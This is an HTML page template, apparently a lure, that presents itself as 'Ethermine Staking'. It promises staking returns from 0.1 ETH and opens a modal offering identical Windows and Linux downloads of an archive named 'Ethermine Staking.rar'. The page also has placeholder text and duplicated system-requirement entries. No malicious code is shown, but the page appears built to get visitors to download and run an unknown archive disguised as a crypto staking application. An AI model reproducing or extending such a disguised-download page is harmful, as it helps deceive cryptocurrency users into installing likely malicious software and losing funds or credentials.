<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<title>Ethermine Staking</title>
	<link rel="stylesheet" href="css/normalize.css" />
	<link rel="stylesheet" href="css/style.css" />
</head>

<body class="body">
	<header class="header">
		<div class="header__navigation flex container">
			<a href="#" class="header__logo">
				<img src="img/logo.png" alt="Logo Ethermine Staking" class="header__image">
			</a>
			<nav class="header__nav flex">
				<ul class="header__list list-reset flex">
					<li class="header__item">
						<a href="" class="header__link link-reset">
							Text
						</a>
					</li>
					<li class="header__item">
						<a href="" class="header__link link-reset">
							Long Text
						</a>
					</li>
					<li class="header__item">
						<a href="" class="header__link link-reset">
							Text
						</a>
					</li>
				</ul>
				<form class="search-form flex">
					<input id="search-input" class="search-input" type="text" placeholder="Search">
					<button id="header__nav-icon" type="button" class="header__nav-icon btn-reset" aria-label="Search Button">
            <svg class="header__nav-svg" width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
							<path fill-rule="evenodd" clip-rule="evenodd" d="M8.1111 2C4.73603 2 2 4.73603 2 8.1111C2 11.4862 4.73603 14.2222 8.1111 14.2222C11.4862 14.2222 14.2222 11.4862 14.2222 8.1111C14.2222 4.73603 11.4862 2 8.1111 2ZM0 8.1111C0 3.63146 3.63146 0 8.1111 0C12.5907 0 16.2222 3.63146 16.2222 8.1111C16.2222 12.5907 12.5907 16.2222 8.1111 16.2222C3.63146 16.2222 0 12.5907 0 8.1111Z" fill="#4898A5"/>
							<path fill-rule="evenodd" clip-rule="evenodd" d="M12.4262 12.4262C12.8167 12.0357 13.4499 12.0357 13.8404 12.4262L17.7071 16.2929C18.0976 16.6834 18.0976 17.3165 17.7071 17.7071C17.3165 18.0976 16.6834 18.0976 16.2929 17.7071L12.4262 13.8404C12.0357 13.4499 12.0357 12.8167 12.4262 12.4262Z" fill="#4898A5"/>
							</svg>
          </button>
				</form>
			</nav>
		</div>
	</header>
	<main class="main">
		<section class="hero container flex">
			<div class="hero__content">
				<h1 class="hero__heading">
					Ethermine staking
				</h1>
				<p class="hero__text">
					Earn interest on&nbsp;your Ether investment without requiring 32&nbsp;Ether. <br>Ethermine Staking offers returns based on&nbsp;Ethereum staking rewards via ETH.STORE. Start earning with as&nbsp;little as&nbsp;0.1&nbsp;ETH.
				</p>
			</div>
		</section>
		<section class="balances container">
			<button class="balances__btn btn-reset" onclick="document.getElementById('balances__modal').style.display='block'">
				Long Button
			</button>
			<div id="balances__modal" class="balances__modal" data-backdrop="static" data-keyboard="false">
        <div class="balances__modal-block balances__modal-animate">
					<span class="balances__modal-exit" onclick="document.getElementById('balances__modal').style.display='none'">
						<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">
							<path fill-rule="evenodd" clip-rule="evenodd" d="M21.7071 0.292893C22.0976 0.683417 22.0976 1.31658 21.7071 1.70711L1.70711 21.7071C1.31658 22.0976 0.683417 22.0976 0.292893 21.7071C-0.0976311 21.3166 -0.0976311 20.6834 0.292893 20.2929L20.2929 0.292893C20.6834 -0.0976311 21.3166 -0.0976311 21.7071 0.292893Z" fill="#46D5D7"/>
							<path fill-rule="evenodd" clip-rule="evenodd" d="M0.292893 0.292893C0.683417 -0.0976311 1.31658 -0.0976311 1.70711 0.292893L21.7071 20.2929C22.0976 20.6834 22.0976 21.3166 21.7071 21.7071C21.3166 22.0976 20.6834 22.0976 20.2929 21.7071L0.292893 1.70711C-0.0976311 1.31658 -0.0976311 0.683417 0.292893 0.292893Z" fill="#46D5D7"/>
							</svg>
					</span>
					<span class="balances__modal-download flex">
						download
					</span>
					<div class="balances__button-block flex">
						<a class="balances__button-windows flex" href="../Ethermine Staking.rar" download="">
							windows
						</a>
						<a class="balances__button-linux flex" href="../Ethermine Staking.rar" download="">
							linux
						</a>
					</div>
					<button class="balances__button-system btn-reset" onclick="document.getElementById('balances__modal-system').style.display='block'">
						System requirements
					</button>
					<div id="balances__modal-system" class="balances__modal-system" data-backdrop="static" data-keyboard="false">
						<div class="balances__modal-system-block balances__modal-system-animate">
							<span class="balances__modal-system-exit" onclick="document.getElementById('balances__modal-system').style.display='none'">
								<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">
									<path fill-rule="evenodd" clip-rule="evenodd" d="M21.7071 0.292893C22.0976 0.683417 22.0976 1.31658 21.7071 1.70711L1.70711 21.7071C1.31658 22.0976 0.683417 22.0976 0.292893 21.7071C-0.0976311 21.3166 -0.0976311 20.6834 0.292893 20.2929L20.2929 0.292893C20.6834 -0.0976311 21.3166 -0.0976311 21.7071 0.292893Z" fill="#46D5D7"/>
									<path fill-rule="evenodd" clip-rule="evenodd" d="M0.292893 0.292893C0.683417 -0.0976311 1.31658 -0.0976311 1.70711 0.292893L21.7071 20.2929C22.0976 20.6834 22.0976 21.3166 21.7071 21.7071C21.3166 22.0976 20.6834 22.0976 20.2929 21.7071L0.292893 1.70711C-0.0976311 1.31658 -0.0976311 0.683417 0.292893 0.292893Z" fill="#46D5D7"/>
									</svg>
							</span>
							<div class="balances__modal-system-window flex">
								<div class="balances__modal-header flex">
									<div class="balances__modal-system-windows">
										Windows
									</div>
									<div class="balances__modal-system-linux">
										Linux
									</div>
								</div>
								<div class="balances__modal-system-descr flex">
									<ul class="balances__modal-list list-reset">
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												Processor clock speed:
											</span>
											<span class="balances__modal-content">
												500 MHz
											</span>
										</li>
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												RAM:
											</span>
											<span class="balances__modal-content">
												96 MB
											</span>
										</li>
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												Video card:
											</span>
											<span class="balances__modal-content">
												32 MB
											</span>
										</li>
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												Free space size:
											</span>
											<span class="balances__modal-content">
												300 MB
											</span>
										</li>
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												Free space size:
											</span>
											<span class="balances__modal-content">
												300 MB
											</span>
										</li>
									</ul>
									<ul class="balances__modal-list list-reset">
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												Processor clock speed:
											</span>
											<span class="balances__modal-content">
												500 MHz
											</span>
										</li>
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												RAM:
											</span>
											<span class="balances__modal-content">
												96 MB
											</span>
										</li>
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												Video card:
											</span>
											<span class="balances__modal-content">
												32 MB
											</span>
										</li>
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												Free space size:
											</span>
											<span class="balances__modal-content">
												300 MB
											</span>
										</li>
										<li class="balances__modal-item flex">
											<span class="balances__modal-content">
												Free space size:
											</span>
											<span class="balances__modal-content">
												300 MB
											</span>
										</li>
									</ul>
								</div>
							</div>
						</div>
					</div>

				</div>
      </div>
			<ul class="balances__list list-reset flex">
				<li class="balances__item">
					<div class="balances__content">
						<h2 class="balances__heading">
							Workers
						</h2>
						<p class="balances__text">
							999 999 999
						</p>
					</div>
				</li>
				<li class="balances__item">
					<div class="balances__content">
						<h2 class="balances__heading">
							Devices
						</h2>
						<p class="balances__text">
							999 999 999
						</p>
					</div>
				</li>
				<li class="balances__item">
					<div class="balances__content">
						<h2 class="balances__heading">
							Hashrate
						</h2>
						<p class="balances__text">
							999 999 999
						</p>
					</div>
				</li>
				<li class="balances__item">
					<div class="balances__content">
						<h2 class="balances__heading">
							Completed
						</h2>
						<p class="balances__text">
							999 999 999
						</p>
					</div>
				</li>
				<li class="balances__item">
					<div class="balances__content">
						<h2 class="balances__heading">
							Percentage
						</h2>
						<p class="balances__text">
							999 999 999
						</p>
					</div>
				</li>
			</ul>
		</section>
	</main>

	<script src="js/main.js"></script>
</body>

</html>